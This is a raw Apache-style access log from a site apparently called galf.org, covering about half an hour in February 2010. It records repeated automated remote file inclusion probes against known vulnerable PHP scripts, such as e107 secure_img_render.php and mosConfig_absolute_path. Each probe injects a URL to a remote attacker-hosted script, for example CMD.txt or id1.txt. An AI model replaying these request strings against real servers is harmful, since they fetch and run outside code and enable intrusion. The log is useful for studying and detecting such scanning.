218.38.136.125 - - [07/Feb/2010:23:34:53 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:34:55 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:35:02 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:35:02 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:35:05 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:35:43 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.59.163.57 - - [07/Feb/2010:23:35:45 -0800] "GET /logs/access_091019.log%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:35:45 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:35:52 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:38:33 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:38:33 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:38:33 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:38:41 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:38:41 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:38:41 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:39:48 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:39:48 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:23:39:51 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:40:33 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:40:33 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:40:33 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:40:40 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:40:40 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:40:40 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:41:11 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:41:11 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:02 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:05 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:12 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:12 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:42:13 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:22 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:22 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [07/Feb/2010:23:42:31 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:39 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:43 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:43 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:49 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:51 -0800] "GET /bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:51 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:42:52 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:43:29 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:43:29 -0800] "GET /logs/access_100125.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:43:29 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:43:38 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:43:38 -0800] "GET /logs/access_100125.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:23:43:38 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:43:57 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:45:50 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:46:42 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:47:10 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:47:17 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:47:23 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:47:47 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:47:49 -0800] "GET /port.php?content=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:47:49 -0800] "GET /logs/port.php?content=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:47:49 -0800] "GET /logs/access_091228.log/port.php?content=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [07/Feb/2010:23:50:46 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [07/Feb/2010:23:50:47 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [07/Feb/2010:23:50:47 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [07/Feb/2010:23:50:49 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [07/Feb/2010:23:50:49 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [07/Feb/2010:23:50:49 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [07/Feb/2010:23:53:10 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [07/Feb/2010:23:53:26 -0800] "GET /logs/access_090928.log%20%20//e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:53:43 -0800] "GET /logs/port.php?content=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:53:43 -0800] "GET /port.php?content=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:53:43 -0800] "GET /logs/access_091228.log/port.php?content=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.246.76.241 - - [07/Feb/2010:23:56:09 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
216.246.76.241 - - [07/Feb/2010:23:56:10 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 4947 "-" "libwww-perl/5.831" "www.galf.org"
216.246.76.241 - - [07/Feb/2010:23:56:10 -0800] "GET /?path%5Bdocroot%5D=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
216.246.76.241 - - [07/Feb/2010:23:56:12 -0800] "GET /logs/access_090921.log//?path%5Bdocroot%5D=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:57:51 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:58:22 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:58:24 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:59:32 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:59:40 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:59:40 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:59:40 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:23:59:42 -0800] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:23:59:42 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [07/Feb/2010:23:59:42 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:59:49 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:59:49 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:23:59:49 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.101.2.63 - - [08/Feb/2010:00:00:47 -0800] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.101.2.63 - - [08/Feb/2010:00:00:52 -0800] "GET /e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.101.2.63 - - [08/Feb/2010:00:00:52 -0800] "GET /logs/access_090928.log//e107/e107_handlers/secure_img_render.php?p=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [08/Feb/2010:00:01:24 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.98.23.9 - - [08/Feb/2010:00:01:24 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
79.98.23.9 - - [08/Feb/2010:00:01:24 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
221.139.0.75 - - [08/Feb/2010:00:01:45 -0800] "GET /logs/access_091005.log//setup.php?setup[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [08/Feb/2010:00:01:45 -0800] "GET /setup.php?setup[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [08/Feb/2010:00:01:45 -0800] "GET /logs//setup.php?setup[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [08/Feb/2010:00:01:47 -0800] "GET /logs/access_100201.log///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [08/Feb/2010:00:01:47 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [08/Feb/2010:00:01:47 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [08/Feb/2010:00:02:36 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
79.98.23.9 - - [08/Feb/2010:00:02:36 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
79.98.23.9 - - [08/Feb/2010:00:02:36 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
77.221.130.15 - - [08/Feb/2010:00:02:57 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
77.221.130.15 - - [08/Feb/2010:00:02:57 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.15 - - [08/Feb/2010:00:02:57 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [08/Feb/2010:00:03:20 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [08/Feb/2010:00:03:21 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [08/Feb/2010:00:03:21 -0800] "GET /logs/access_100201.log///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [08/Feb/2010:00:03:21 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:03:23 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:03:23 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [08/Feb/2010:00:03:24 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.15 - - [08/Feb/2010:00:03:24 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
77.221.130.15 - - [08/Feb/2010:00:03:24 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [08/Feb/2010:00:03:36 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:03:36 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:03:37 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:03:40 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:03:40 -0800] "GET /logs/access_091102.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:03:40 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:03:40 -0800] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:03:40 -0800] "GET /logs/access_091102.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:03:41 -0800] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [08/Feb/2010:00:03:58 -0800] "GET /logs/access_100201.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [08/Feb/2010:00:03:58 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [08/Feb/2010:00:03:58 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [08/Feb/2010:00:04:29 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [08/Feb/2010:00:04:29 -0800] "GET /logs/access_100201.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.98.23.9 - - [08/Feb/2010:00:04:29 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:04:43 -0800] "GET /logs/access_090803.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:04:46 -0800] "GET /logs/access_090803.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
